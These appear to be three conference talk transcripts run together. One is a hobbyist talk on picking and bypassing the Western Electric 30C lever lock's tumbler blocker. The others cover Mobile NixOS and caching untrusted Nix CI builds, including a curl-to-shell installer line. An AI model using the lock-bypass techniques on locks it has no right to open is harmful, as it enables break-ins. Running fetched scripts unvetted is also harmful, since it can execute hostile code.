And the first time I heard about this lock, well, not the very first time, but the first time I got interested in it, was when Matt Smith, also known as Huxley Pig, did a video. He did a talk, and I saw the recorded talk on video, about a few really cool locks that he had been working on, and this was one of them. And he had actually made a little bit of progress on how to go about beginning to pick this. He was still working on it, and he said he had spent a lot of time and effort trying to figure it out. And that kind of made me start to think about this lock as kind of a goal, just basically thinking about how cool it would be if I could be the one that actually figured it out. And so I went online and searched a couple articles. Matt Blaze has an amazing article on these locks. There's also a little bit of information on a couple of the lockpicking forums. But it wasn't until Captain Hook released a video on Lockpickers United about a decoding method to get into this lock, to be able to go in there, figure out the key bitting, and replicate a key to open this thing. So with a set of wires similar to this, with very precise measurements and little 90-degree turns on the ends, he was able to go in there and exploit the fact that returning the key to the zero position would also return all the levers to the zero position, and that there was a finite and exact measurement between the keyway and the gates and the levers. And since he was able to fit a piece of wire in there, he was then able to determine where the gates were true and false, and was able to make his own duplicate key and open the lock from there. So when I saw that video, it kind of kicked me in the butt, and I thought, oh man, if I'm going to do this, I better get started. So that day I went on eBay, found one of these, and ordered it. It arrived a few days later. I started messing with it and figured out why everybody had such a hard time with it. This thing is an incredible pain.
But the first thing I did was actually create an acrylic faceplate for it so that I could see inside, so basically I knew what I was dealing with. So now, this is the 30C here with an acrylic faceplate, and you can see a couple differences from the 29A. This one actually does have a spring: there's a single leaf spring here that puts tension on all the levers. If you raise one lever up, it lifts the spring and basically eliminates spring tension from the rest of the levers, so they are free-floating. This one does not have that stationary ward in the center. But everything else is pretty much the same as the 29, besides this mechanism right here. And this is what makes this lock so tough: this is the tumbler blocker. What this does is, this serrated piece here, along with the points on the levers, makes it so that as soon as you put tension on this thing, that blocker moves into place and locks all the levers before the fence even gets to them. So in picking a lock, what we normally do is put tension on the lock, and after you put tension on it, you manipulate the internals and you can feel, say on a lever lock, the fence rubbing on the levers, so you'll know when you set a lever, when it clicks into place. Well, on this one, before you can even put tension on it, that blocker moves in and stops all those levers from being able to move. You can see here that the blocker is already engaged, but the fence is super far away from the gates. Now, they did that for a couple different reasons. Obviously, one being pick resistance and manipulation resistance, but another being lack of maintenance. Some of these were in very remote areas where the weather and the environment were not very friendly.
So if you got a lot of dirt and gunk and other things in this lock, or if there was a lot of key wear, things like that, as soon as you put the key in and it raises the levers up to an approximate height, that blocker will lock them all into place and make sure that they're at the right height for the fence to move into the gates. So that design was both for manipulation resistance, but also for longevity of the lock, and to allow it to work in some very harsh conditions. So that's what makes it so tough to pick: that blocker there. Now the very first time I picked this lock, what I did was I bypassed that blocker. And there's a video of it online; it was the first video that I posted of this lock. And I took a shim like this, actually this is the one, inserted it in the top, and you got to get it under the anti-tamper switch, which I'll show you a little later. And that can actually hold the blocker back so that I could go in there and manipulate the levers and see what it felt like to actually pick this thing. So once I did that, I posted a video online to basically show my progress, show that I had actually picked the lock, which at the time was a world's first. Nobody had picked one of these on camera before, even using a shim to bypass the blocker. So it was a first, but it wasn't the first that I was looking for. But after posting that video, I got quite a bit of response from people, Captain Hook being one of them. And I talked to him a bit about this lock and got some tips. We exchanged a few tips here and there about the lock and got to talking. Captain Hook is an amazing person, great picker, one of the best in the world. And I didn't want to give too much away, but I mentioned that I had been working on a method of picking it that was entirely through the keyway, which is what we're looking for.
So the first thing I did was I took his idea of using bent wires to find the gates and I thought, well, what if instead of identifying the gates one at a time, what if I took a wire and bent it in a way that I could insert it in the lock in the key way and put pressure on all those levers at once? I could then pick them one at a time and get the wire to go into all the true gates, which would set the levers all to the correct height. And I could then turn the bolt and open the lock. Now this kind of worked. I was actually able to get all the levers set onto the wire, but when it came time to actually throw the bolt and open the lock, that's where I ran into some issues. It's kind of a chunky wire and there's not a lot of room to work in there. So it got in the way, unfortunately. So when I went to throw the bolt, the fence got stuck on the wire and would not move enough to actually open the lock, unfortunately. I spent a lot of time trying to perfect this wire method. That's all the scratches you see inside here was me working on the wire, trying to get it in there perfectly and get everything to work. I experimented with a lot of different ways. I tried to get all the levers set right, then put the bolt in a little bit and then remove the wire and continue, but nothing was working. I mean it was a good idea, but it ultimately failed, unfortunately. So well here's another one that I had made. This was a much flatter wire that I thought might work. It's a much weaker, much flatter wire. I figured if I could do that, maybe I could just force the bolt through the wire, bend it out of the way, but at least the lock would be open, but that didn't work either. So I started thinking about Matt, Huxley Pig's video again, and he had come up with an idea where he would overlift one of the levers up to the point where it would hold the blocker back from the top. I don't know if I can get this in here to show you how this would work, but let's see. 
So if you lift, oh wait a minute, I gotta turn the keyway. Get that out of the way. So if you lift up on one of the levers and you lift it past where it's supposed to go, oops, I don't think I can do this without actually turning the key, but you can get it overlifted to where it will actually get stuck up here and hold the blocker back, and I think you're actually deforming the lever at that point. It's really tough to get it up there. But it was an interesting idea, and it made me think: instead of trying to align the gates using a wire or anything like that, maybe I could use the levers to hold the blocker back, but in a different way. One day I was driving to work and talking to Captain Hook, and I had an idea. And I had to wait all day; it was super hard not to leave work early or run home and try it, but I had an idea of what I could possibly do. So what I thought was, if I could hold one of the levers up so that the point of the lever would sit at the point of one of these serrations, it might hold that blocker back just enough to where I could pick the levers past the blocker. Now I'd still have to deal with the blocker, they'd still be clicking in these little serrations, but it might be just enough to where it wouldn't be fully engaged and I could actually pick the lock. So as soon as I got home, I started working on creating something that would make this happen. And ultimately I created this. Just this little flag tool here; it's got some warding cut into it there. And what this does, where's that tension wrench, here it is, alright, so what this does is you actually insert this right into that first piece of warding all the way back and sit it into the actuator. And when it's sitting there, you then tension the lock and that little flag in the back, I don't know if you can see that, let's try to get some better light here.
So that rear lever is sticking up just a little bit more than the rest of them, can you see that back there? Yeah, I think you can see that. So that is actually holding that blocker back, and what I was able to do at that point was get a picking wire in there, and actually I started with the picking wire in there, but it would hold the blocker just enough that I was actually able to put tension on the lock and move the levers. And that was actually the very first way that I ever picked this lock open. And it worked, it actually worked. There's a couple videos of it online. The first one got a lot of scrutiny of course, because it was a world's first. There was a little piece of wire sitting on my desk that people thought was some sort of a shim to hold the blocker back, or they had all sorts of crazy ideas, but as soon as that happened I immediately did another video with a clean desk and made sure that there was no possible way whatsoever that it was not real. But that was the very first way that I picked this thing open, and I was super happy; I couldn't believe it. I was just out of this world ecstatic. It was incredible, it was so great. But in thinking about it, it wasn't the easiest thing in the world. It was a very delicate balancing act and I wanted to make it even better. So with this: this was designed to hold the blocker just below that last lever's true gate. So that eighth lever would be the last one that I picked, and when I picked it, I only had to go one click to get it into its true gate. And I'm pretty sure that this one tool probably would have worked for any other lock unless that eighth lever was a zero cut, that is, if it was lower. Anything higher, you could have shot it up into place. It wouldn't have been easy but it would have been doable. But if it was a zero cut, it would already be sitting too high and you'd have to hope that you could get it to drop down. Sorry, I wet my whistle again.
So then I had the idea: what if I can hold all the levers up to the right height? What if I can make all the levers hold that blocker back? So it didn't matter which one I picked when, or what the binding order was. And so I started making tension wrenches. I designed a bunch of different tensioners that would go in and hold the levers up to different heights. And there were slight problems with all of them. It was hard to get a wire in there and keep holding everything, and it was still a very delicate balancing act, don't get me wrong. But ultimately what I figured out was that a thin wiper insert was exactly the right height to go in there in that first ward and hold those levers up to the exact point where they need to be to hold that blocker back. And you can actually pick the lock like this too. Now again it's difficult, because there's not a whole lot of room to work. But it does hold all the levers up to where you need them. And you can go in and pick. It's possible. But again that wasn't good enough. It wasn't easy enough. So I basically just started kind of playing with the lock and looking at what happened when I did different things. So I started looking at what would happen if I just tensioned it. So you just tension it. And I finally noticed, if you look here, when you tension this thing the blocker is not engaged. It's sitting point to point with one of these levers. But also that bolt isn't engaged either. The bottom of the fence here is actually hitting the bottom of the levers. So this lock starts in a very interesting configuration here. I mean, you'd think that the blocker would engage, hold all the levers at zero, this would have no room to go in, things like that. But for some reason it's not. And all those levers are held right there. But this guy is hitting on the bottom. So if you were to put a picking wire in here you can actually start picking this lock. But unfortunately nothing's moving, because that fence is stuck at the bottom there.
So I started taking measurements and I realized eventually that if I took the smallest possible wiper insert and inserted it here in between the wards there that plus the picking wire was about just the right height to hold those levers at that same zero spot where the tensioner was holding them before. So what I figured out at this point was that I can actually tension the lock, then insert a picking wire. And if I just hit the couple levers that are holding the fence back I get to that spot where I want to be. Now granted it is a balancing act and that blocker will lock in a lot. So it takes a lot of resets and if you're ever trying to pick this thing do not be afraid to start over because you have to start over a lot. But eventually you'll start to learn which levers to pick first. And once you realize that you can actually go about picking this thing. So if you see that the levers are sitting at the very bottom of the blocker there holding it back just enough. So let's go in and find the lever that the fence is stuck on. Get it out of the way so the fence will then engage but the blocker is still being held back. Then I'm going to find a couple of levers and you actually want to try to pick the very tallest levers first to get them out of your way. Whoops, lever wrong. So if you ever hit a wrong lever you'll have to restart. And that's okay like I said it's going to happen a lot. So just feel around in there for a binder. Here we go find the binder. Blocker engaged again. So I'm probably not going to be able to do this live on video or not quite live but on this video here without some practice I haven't picked one of these in quite a while. But, well then maybe I'll get lucky. Oops, can drop the actuator there. So that happens when your lock's not fully put together. There it is. Yeah, right now I'm determined. I'm going too high back there. Maybe not. There we go. Alright. So, there it was. I hope that was easy enough for everyone to see. 
But yeah, so it is possible. That was a full pick of the Western Electric 30C, granted with a clear face, so it's not that impressive. So hopefully we'll get some more people out there picking these things. And yeah, I hope everybody enjoyed that greatly. So at the end of this, I'm actually going to attach the video where I pick this lock without the cover taken off, fully factory sealed, with that same method. So you can see what it looks like without an acrylic cover on it. But anyway, yeah, there we are. If anyone has any questions or anything, I've been here the whole time, so I'm sure you'll have asked them already. But feel free to get a hold of me. I'm on Discord, the Lockpickers United Discord, as nothing. I have a YouTube channel, which is a "nothing" symbol. If you search Western Electric 30C, you can find me. And I'm here. If anyone wants my email address, it's mrmr.nothingpicks at gmail.com. Reach out to me if you have any questions. If you're stuck, I will gladly help anyone through this. So, alright, there we are. Thanks a lot all. Hope you all enjoyed DEF CON, and stay safe out there. Take care. Bye. Alright, hey everyone. Hope you all are doing well. So, I have another Western Electric 30C here. This one has not been taken apart yet. All the rivets are still intact. It is just like I received it. I do have a key for it. It's got some pretty extreme bitting. It's got a zero cut right there in the two position. Five cut back there. That number four is a one cut. It's annoying trying to set those levers without over-setting anything else or bumping anything else, whatever. But it works. Sometimes I think one of those zero cut levers jumps up from the key too fast. And you can see the blocker, if you look in that corner, moving in and out. So that's still there. Yeah, so let me see if I can get this thing open here. Alright, so I kind of developed a new technique that doesn't involve that third tool. Just a picking wire and a tensioner.
Kind of doing a lot of trial and error on these things and research and whatnot. Hoping to get something pretty comprehensive put together at some point. You are going to see me reset a lot, because if I do anything wrong, I have to completely start over. Okay. Okay. Okay. Yes! Hell yeah! Alright, there it is. Oh man! Yes, oh I'm so happy. Okay. Oh, I'm so excited right now. All right, so, yeah, since it's not taken apart I can't really gut it for you, but I guess I can at least kind of give you a 360 again. Let me drop this out of the way first. All right, so there it is, picked open. Oh, I'm so happy. All right, now here, let's see if we can get this image of the blocker coming back out. There it is. All right, all: Western Electric 30C picked. All right, have a great one. Take care, all.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices and the techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50690 (DOI)
I'm Samuel Dionne-Riel; you might recognize this avatar. I work on Mobile NixOS. What's Mobile NixOS? Mobile NixOS is a NixOS distribution for your phone. Some conditions may apply. The goals are: integrating a heterogeneous ecosystem, which means different kinds of phones, different lineages of phones, and all of this in one repository. And its goal also is to make full use of the hardware. This means calling, SMS, data, acceleration, everything. If you can't call from your phone, it's not a phone, it's just a screen. And then if you can't use the internet from your screen, it's just a useless screen. Then, it should work like NixOS and work with NixOS. I think it's easier to start with some things that I don't aim to do right now, or maybe not ever, under the project name. Like, I don't want to prescribe any kind of graphical environment. So just like with NixOS, you're free to choose whatever you want to run as long as it's packaged. And if it's not, then come and contribute. I don't intend to make it particularly easy to run Android apps, but it's just something that can be done via software, since there's projects like Anbox that already do this. Then, porting devices to mainline Linux. I know it's not nice to say that I don't have a goal to port devices to mainline Linux, but it's Mobile NixOS that doesn't have this goal, because I think it's a fun side project that's probably going to happen for at least those that I can try it on. Let's start with some history. In June 2018, that's when I made the first commit. And it's also when I announced the project on the Discourse. In July 2018, I had a second device ported. This is nice since this allowed me to check if there were some bad assumptions in there; some, but not that much. And then from July to November 2018, I was busy releasing NixOS 18.09. Then an uncomfortably long pause. In January 2019, there was a post on the Discourse from Armin introducing NGI Zero.
So I joined January 31st. I wrote and sent an application for a grant. And the deadline was the 1st of February. So it didn't take that much time to write up. More on that later. I was selected for the second round. This is good. And in March, I received some questions from NLnet. Turns out my application was too narrow in scope. They wanted me to expand the scope and thus expand the grant. So I did. And after some back and forth, the project was accepted. Then the more important bit for me: in August 2019, I left my job and now I'm working full time on Mobile NixOS. The current state. Right now, we have three devices booting Mobile NixOS, and I think I didn't hold power long enough on the other. I hate phones. Then, I know it's just way too small to see, but it's just for flair. There it is. It's booting on two different devices. And those devices: there's the ASUS Zenfone 2 Laser. It's the one on your left. It's much older than the other devices. The Zenfone 2 Laser is pretty much in the first or maybe second round of AArch64 devices for Android. And the Xiaomi Redmi Note 7 is the one on the right, which is fun since it's pretty new. It was released, I think, in the beginning of this year. So this allows me to just check that, okay, this works on both old and new hardware. This is just amazing because it works on old and new hardware. Then the OnePlus 3; I don't have it with me. But this one was just trivial to port. It's probably about in between in terms of age. But about three hours after I received it in the mail, it was already ported and booting just to the same state as you can see, maybe, I hope, probably not on those phones. I have other targets like the ASUS CT100. This one is interesting since it's not an Android target. This is a Chrome OS-based tablet. This allows me to test whether I made assumptions that were only for Android-based, for Qualcomm-based Android devices, even. And it turns out, not much. And I added the target.
So I've got examples of two different kinds of targets. There's the Google Nexus 7 2013. This one is special since it's the second device I ported to, but it's not AArch64. Not AArch64, but otherwise standard NixOS, since it ends up being a standard NixOS system once booted. There's no binary cache, so I did not test stage two yet. But I have strong assumptions that it's going to work once I've got a full build of the stage two, not working, but building. The Motorola Moto Z Play. Not working entirely, but you see there's a DD after the work in progress. That's because it's my daily driver. I can't spare the phone for now to test. So this one is currently yellow, but it might stay yellow, just as the Nexus 7. This is because Motorola, and they are not alone among OEMs in doing this, released an AArch64 device with a 32-bit, so armv7l, userland. So depending on how access to hardware works, like Wi-Fi, and maybe not Wi-Fi but probably some other hardware, it might not be possible to run a 64-bit system using the proprietary bits. Let's see how it goes. Then there's the Google Pixel 2 XL. This one is just work in progress since I don't have it on hand anymore, but I was able to get one for a couple of days and just work. It's almost working. There's just one little bit, and it might be trivial to fix. And a QEMU VM. This one is not AArch64. It's used mainly to test the system image generation and check the graphical applications, since you don't want to first build for AArch64 and then transfer it to your phone; this takes quite a while. So the VM is for developers to develop applications. So, stuff that's currently work in progress, meaning hacks I'm currently using to make it boot. The kernel is built in, and without module support. Built in means it's built into the boot.img file that's flashed to the boot partition. I'll show you around that and why it's an issue soon. And without module support, it's not much of an issue.
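To make that concrete: since the kernel lives inside boot.img and only that partition gets flashed, getting a built image onto a device with standard Android tooling looks roughly like the sketch below. This is illustrative only, not the project's own tooling; it assumes an unlocked bootloader and a device waiting in fastboot mode, and the image name is a placeholder.

```shell
# Illustrative sketch only, not Mobile NixOS's actual flashing tooling.
# Assumes an unlocked bootloader and a device in fastboot mode.

# Try the image once without writing anything; on many devices this
# boots the given kernel/initrd directly from RAM.
fastboot boot boot.img

# Once it's known to work, write it to the boot partition. Only the
# partition holding the kernel is touched, never the bootloader itself.
fastboot flash boot boot.img
fastboot reboot
```

The `fastboot boot` step is why bricking is unlikely: nothing is written until you are reasonably sure the image works.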
It's just easier to start porting when you don't have to bother with module resolution: is it loading the right modules in your custom stage one, which you currently can't access via serial, since there's no serial access on most phones? So you always boot the current generation. That's another hack. You can't choose a generation at boot. There's none of your usual GRUB or systemd-boot or anything as a bootloader; it's ABL or aboot for the Android devices. This means that there's no choice of the generation. So if you make a small accident with your nixos-rebuild switch, you might need to reinstall for now. But that's just for now. And there's limited hardware support, meaning that there's not much of the hardware working. There's sound lacking, which might not be much of an issue to fix. There's Wi-Fi not working, but everything is known; I've just been lacking time to finish working on that. There's no GPU acceleration, but I've got a contribution which might do all that already. And there's no cellular communication, so no calls, no SMS, no data. And then there's no proper phone interface. What I mean by that is there's nothing like Plasma Mobile or Phosh; it's just your usual X11 desktop, which, well, is not made for touch, even on a real big screen like a tablet. So it's all room for improvement. So let's see how I'm going to improve it. I'm going to write documentation. I know it sounds weird, writing documentation, but it's important. So: the basic structure, so you know how everything is put together. Then a porting guide. Since currently the only way porting works is I try to port to a new device and I see, oh right, I fixed that on the other device by switching which options, and that's not a great guide. And then a list of devices and their status. Just like when you're going on the LineageOS website, you've got a list of devices and their status; same thing.
And a website tying this all together. I know this is not the fun bit. I need to work on enhancing the boot process. There's a couple of steps in there. First, selecting a generation. This is quite important and in the DNA of NixOS. We probably need to kexec to another kernel. Since switching kernels is not easy, ideally I'd like every generation to list which kernel they use exactly, and treat the boot.img just like it was a bootloader. Then there's a strategy needed for a virtual keyboard during stage one, since you don't want to break out your full USB keyboard and plug it into a USB adapter on your phone when you're rebooting it because it crashed for whatever reason, maybe not Mobile NixOS's fault. Then, enhancing the boot progress reporting, since right now it's just an image telling you it's stage one and then another image for stage two. It's probably better if you have some output, like: it's currently doing this thing, this thing, this thing. All work in progress. Then we need to make more things work, like sound, GPU acceleration, Wi-Fi and everything, you know. Phone software. This is not about phone environments, it's about telephony software. I don't think there's much packaged in NixOS right now, so it's just taking time to do this. And then, about a phone environment. What I mean by that is, just like the DEs, WMs, DMs (you all know what these mean), I want you to know that PE means phone environment. Let's continue with questions I already know you have in your mind and want to ask me. What do I need to port? You need, first, an unlockable bootloader, and also to have unlocked your bootloader. It's not enough to just have one that's unlockable. And then kernel sources, ideally, for a speedy port. It's possible without the sources, but it's going to be an uphill battle. How can you help? You can help by porting to new devices.
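As a sketch of that "treat boot.img like a bootloader" idea: a NixOS generation's profile exposes its kernel, initrd and kernel parameters, so chain-loading a chosen generation could plausibly look like the following. This is a hypothetical illustration of the design being discussed, not code the project ships; the generation path is a placeholder.

```shell
# Hypothetical sketch of generation selection via kexec.
# 'gen' points at whichever system generation the user selected.
gen=/nix/var/nix/profiles/system-42-link

# Load that generation's kernel and initrd, passing its stored
# kernel parameters plus its init as the command line.
kexec --load "$gen/kernel" \
      --initrd="$gen/initrd" \
      --command-line="init=$gen/init $(cat "$gen/kernel-params")"

# Jump into the freshly loaded kernel, replacing the running one.
kexec --exec
```

The stable boot.img kernel stays flashed, and every generation can still bring its own kernel on top of it.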
That's like the first way; it's probably the best way to help, since there's so many devices and only so many hours in a day. Then you can test with the devices you own. If you already own one of the devices listed previously, or one of the devices that's going to be listed in the future, you can just run it, hopefully. Then, packaging software. This could be done without even any mobile phone. With the QEMU VM, some work on parts of the stack, most likely the phone environment, some of the software, testing that things work as expected; things can be done without even having a phone that's supported. Other things you can do to help: talk about it. Not only talk about Mobile NixOS; just forget about it for one minute. It needs to become ingrained in everyone's head, maybe not the normal people, but every geek that has a phone: it should be normal to want to run another mobile operating system. I'm not saying necessarily a new Linux distribution. It should be normal to even want Windows on your phone. You probably don't want it. But it should be normal to want to run whatever you want on your phone. This is not something that we can fix. It's something that can be fixed most likely by the OEMs, but even then, most likely by the manufacturers of the CPUs, the systems-on-chips. Let's try and make this an issue that's known; anyway, I most likely will not buy a phone where I can't control the boot process from A to Z, and another issue is phones where it's easy to break things by accidentally flashing to the wrong partition. I didn't skip anything; this is something that's to be continued. Again, now I'm ready for your questions, hopefully. Ask me anything. We've got some time. Hey, how many phones have you bricked while trying to run this? Can you repeat please? How many phones have you broken? None. It's the easy way. You don't have much risk as long as you don't flash the bootloader, the one bit before Linux.
If you only flash the bits on your Android phone where Linux resides, it's, as far as I know, like 99.99999% safe. I don't want you to come to me when you break a phone, but I think that as long as you don't flash stuff to partitions you shouldn't flash stuff to, it's going to be fine. I have a question of my own. Do you still keep the original kernel in place and kexec into the new one, or do you even replace the original kernel? Currently, right now, it's building the OEM-provided kernels. Why? The reason is simple: everything already works with that kernel. The Wi-Fi, the cameras, the sound, everything is supposed to work with this kernel. Then this kernel could get updated. Some projects already update kernels from Android OEMs. What I like is that there's always going to be the boot.img kernel that's going to be a stable one, one that you trust, one that you've built and you know works. Then you're always able to just kexec into a new kernel that might be mainline, hopefully mainline, where you're working on porting it and bettering the whole Linux ecosystem. If I have a LineageOS device which has all your checkmarks checked, how much hard work and sweat separates me from booting Mobile NixOS? Days, weeks, months? Your first port, maybe a week, depending on if you're lucky, if the phone is trivial to port to. But when you're using a phone that's already well supported by LineageOS, in my experience it's much easier, since everything is listed already in the open. Other phones to port to are phones where there's only the OEM source dump and no community yet, like the Redmi Note 7 right here. Fun story: that's my first Xiaomi kernel, first Xiaomi phone, first Xiaomi kernel from their open source kernel release. It would not boot, not at all. I finally figured it out, since during this time some other projects were porting it, and when I found out which option I was lacking, I searched online for what this option was doing, and it's documented in the wiki of the project.
So basically, read the docs. So when you use the kernel sources from the OEMs, can you reuse the Linux builds that we use in Nixpkgs, or do you have to write your own build files for that? When a device gets ported to mainline, then generally that would mean that you can use a normal kernel, but until then you're going to need to build a kernel specialized for your phone, or maybe a family of phones. Is that the right question that I answered? So if you're using the OEM's kernel with their modules and drivers, which would support the hardware like LTE, what is the challenge to get those devices working? Can you repeat the end of the question? What's standing between you and supporting the devices, like sound and modems? For porting to mainline, the main issue is that most of the time the OEMs just dump horribly atrocious code to just make it work, and so it just can't be ported forward. Sometimes there's also breakage in the kernel APIs, the internal APIs, and that's normal, it's to be expected. They never said that the internal kernel API is stable; it's the kernel API for userland that is stable. So that's one main issue. And then, about just porting this kernel to work on Mobile NixOS: no issues. That's exactly what we're using. We're using the OEM dumps to get started. Perhaps one more question. Have you looked at packaging what Jolla has as their UI, the continuation of the Nokia operating system? Can you repeat please? I didn't hear you. The Jolla operating system, Sailfish; have you looked at packaging those things? Because I don't think they're going to be extra friendly to packaging outside of their distribution. Currently I'm not working on anything else than a standard GNU/Linux distribution. So it should be possible, just like everything is possible with enough time, to make the whole Sailfish OS build with Nix.
But Sailfish OS, even though it's more GNU/Linux than Android, is still an OS, just like LuneOS, which is the open source part of webOS; it's a whole integrated operating system. Just taking bits from them is sometimes harder. So it should be possible, but it's not a current goal, due to the lack of human power working on the project. Maybe in the future we will. Any more questions? Would you benefit from us giving you our old phones to make them all work on NixOS? I would benefit if you were to use your old phone to port to it yourself. Not only because I'm lazy, but also because you're going to have a phone with Mobile NixOS in your hands, so you're going to be able to test it and maybe file bugs, or even better, PRs for whatever is missing for you. Then the second question would be: for the grant that you got, is it limited to some extent to only you, or is it possible that in the future you might extend your project to have multiple people working on it as well? If I understood what it's about, the grant: I'm not perfectly sure. I could ask the people from NLnet that I think are hidden in the room, and they would tell me if it's all right. But I think so. The best thing to do is write a new proposal. Since there is no microphone: the best thing to do is to write a new proposal, which means from yourself, or something like that. If you have additional features that you would like, or additional phones that you would like to help with, which are maybe not as large as the stuff that Samuel is doing right now, you can also ask for fairly small grants to help. Does that answer the question? If you want to do a whole desktop, which would be a larger thing, that's all fine with us. It was fun presenting to you. Have a nice day. Thank you so much. Thank you.
Building and managing your mobile device's operating system with Nix, Nixpkgs and NixOS? More likely than you think! Even on the device you already own*! *some conditions may apply
10.5446/50692 (DOI)
Hello. There we go. Hi, I'm Florian; the internet knows me as flokli. Apart from doing Nix packaging all day, I'm interested in build pipelines, infrastructure, low-level userspace stuff, networking, and tinkering with hardware in general. At work, I'm a site reliability engineer at Tweag. By the way, they are hiring, so if you're interested in that, just reach out. Today I'm going to talk about untrusted CI, and how to use post-build hooks to get automatic caching of untrusted builds. I'll be talking about CI in general (what you want a CI to do and how you want it to behave), about Nix binary caches in general, how to use private caches and how to handle signing of the builds in those private caches, how to handle limitations in simple implementations, a proposed solution, how this improves things in general, and future ideas on what to do with it. So how do we want CI to behave? Well, in general it should lint, it should analyze, it should build, it should test, and it should package your project. It should do that on each commit, to assist developers in their workflow while they are iterating over a PR. So especially you want it to run on PRs, to discover all breakages, or most of the breakages, before they reach master. But most importantly, you want your CI to be fast. If you're waiting 30 minutes or an hour for your tests to pass or not pass, and you're basically blocked, spending your time on this, that's just a huge problem and massively decreases developer productivity. With a small project, that's not so much of a problem, but as projects grow, build time likely does as well, so still having a snappy CI becomes more and more challenging. And when using Nix to provide those dependencies, or to build the entire project, you can make use of binary caches.
In fact, we do already most of the time: there's cache.nixos.org for all the packages in nixpkgs built by Hydra, except unfree packages and packages currently failing, but that's another story. However, in your project there might also be other packages not generically suitable for nixpkgs, because they are domain-specific, or they are custom overrides, or unfree packages, and you still want to cache those in your CI pipeline. So what you do most of the time is: you might have a Hydra or whatever does your build, but in general you go with a private cache of some sort that is added on your developer machines, so they can make use of it. It's either self-hosted, or based on some bucket in some cloud, or entirely managed. So I'm going to talk about how to set up those caches quickly. What you do is: you generate a signing key pair on one machine. On all machines that use this cache, you configure your NixOS configuration or your nix.conf to point to those endpoints, the public endpoints to download the binaries from, and you add the public part of the signing key pair. And to upload, you eventually use some sort of nix copy command, or you expose the entire Nix store of one machine to the others. In general, nix copy supports ssh-ng to copy to another machine, HTTPS (HTTP PUT) to upload stuff, and S3 buckets, and there's an in-progress PR to push to GCS buckets as well. So, assuming your project has a default.nix with a dependencies attribute containing all the dependencies of your project, you might end up doing something like this. Oh, I should probably not move the mouse. You somehow get a list of all the dependencies, all the Nix store paths that are part of your build, of the dependencies of your build, or of your entire project, and then you issue a nix copy command, if you don't expose the Nix store.
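As a rough sketch of what such a setup might look like (the key name, file paths, bucket URL, and the `dependencies` attribute are placeholders of my choosing, and `nix sign-paths` is the Nix 2.3-era spelling):

```shell
# One-time: generate a signing key pair for the private cache.
nix-store --generate-binary-cache-key my-cache-1 \
  /etc/nix/cache-key.private /etc/nix/cache-key.public

# On every machine that should substitute from the cache, nix.conf gets the
# endpoint and the public half of the key, alongside the defaults:
#   substituters = https://cache.nixos.org s3://example-nix-cache
#   trusted-public-keys = cache.nixos.org-1:... my-cache-1:<contents of cache-key.public>

# The naive upload step: build, collect the runtime closure of the result,
# sign it, and push everything to the cache in one go.
nix-build default.nix -A dependencies
nix sign-paths --key-file /etc/nix/cache-key.private \
  $(nix-store --query --requisites ./result)
nix copy --to 's3://example-nix-cache' \
  $(nix-store --query --requisites ./result)
```

Note that this loop only runs once the whole build has finished, and it runs as the same CI user that holds `cache-key.private`; both points matter for the limitations that follow.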
It might work in a lot of cases, but sometimes there are drawbacks. You might not have all the build dependencies available at a central location, so you can't just call nix-build -A on some magic attribute, because there are scripts invoking Nix by themselves: you have shell scripts calling nix-shell, or you have Bazel shelling out to nix-build to build other packages, or you have import-from-derivation and don't really know at first what you're going to end up building. And then, of course, you can track those manually in your .nix files and make sure that you catch all the packages you want to build, build them, and then start the actual build process, but that's all quite laborious, and it gets even harder; it doesn't get better. Another problem is that if one of those packages fails to build, the approach of waiting for the output path and then copying over the whole transitive closure just won't kick in, because it never got a chance to upload the intermediate dependencies if you have not specified them before. So you might bump a higher-level thing, it fails to build, and all those other dependencies you also had to rebuild just don't end up in the cache, because you never reached the point of actually building the leaf package in your dependency graph. Another problem is that the upload is another manual step in your CI pipeline. Very likely you end up with code dealing with all the signing and uploading inside your CI code itself, which in theory should only say "I'd like to build this thing", and then it should be cached. You don't really want to mess with figuring out what to upload and then manually calling the upload; it should just work, and it shouldn't bloat your pipeline code.
And another problem, which I personally find a bigger problem: as the binary cache is added and used as a substituter on all developer machines, and probably even production machines, having wide access to it, with developers or external contributors able to change this sort of scripting inside your CI pipeline, means it's very easy to extract the signing key. You basically end up with a backdoor: a way to pollute the cache. So yeah, that's all not so nice. And while one and two might just increase cache misses, and three might be just annoying, three and four together, for the reasons mentioned, basically require some sort of approval process for PRs, at least for external PRs. And that's all not very nice, negatively impacting both cache hit rate and turnaround time for developers. So how do we solve this? There's one way that I'm going to propose: together with multi-user Nix and a recently introduced Nix feature, you can basically fix this. What you do is: you have a CI user that runs your regular build process. It uploads a build recipe to a privileged Nix daemon. Oh, those animations work, nice. And this Nix daemon instructs all the builds to happen as temporary, unprivileged, sandboxed build users, and afterwards it takes care of persisting the result to the local Nix store. Assuming you have no local user privilege escalation on that machine, or some weird hash collisions, this effectively prevents regular CI users from manipulating the local Nix store. In a non-multi-user Nix installation, all three of those different concerns would basically be running as the same user, so the regular CI user could in practice modify the Nix store in some weird ways in some cases. So multi-user Nix solves a lot of those concerns and isolates this.
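For reference, a multi-user installation on a non-NixOS builder is roughly the following; this is a sketch of the official installer's daemon mode (on NixOS all of this is preconfigured for you):

```shell
# The official installer's --daemon mode sets up multi-user Nix:
sh <(curl -L https://nixos.org/nix/install) --daemon

# What it creates, roughly:
#   - a nixbld group plus nixbld1..nixbldN users, which the individual
#     sandboxed builds run as
#   - a root-owned nix-daemon that owns /nix/store
#   - unprivileged clients (such as the CI user) that only talk to the
#     daemon over its socket instead of writing to the store directly
# The corresponding nix.conf setting is:
#   build-users-group = nixbld
```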
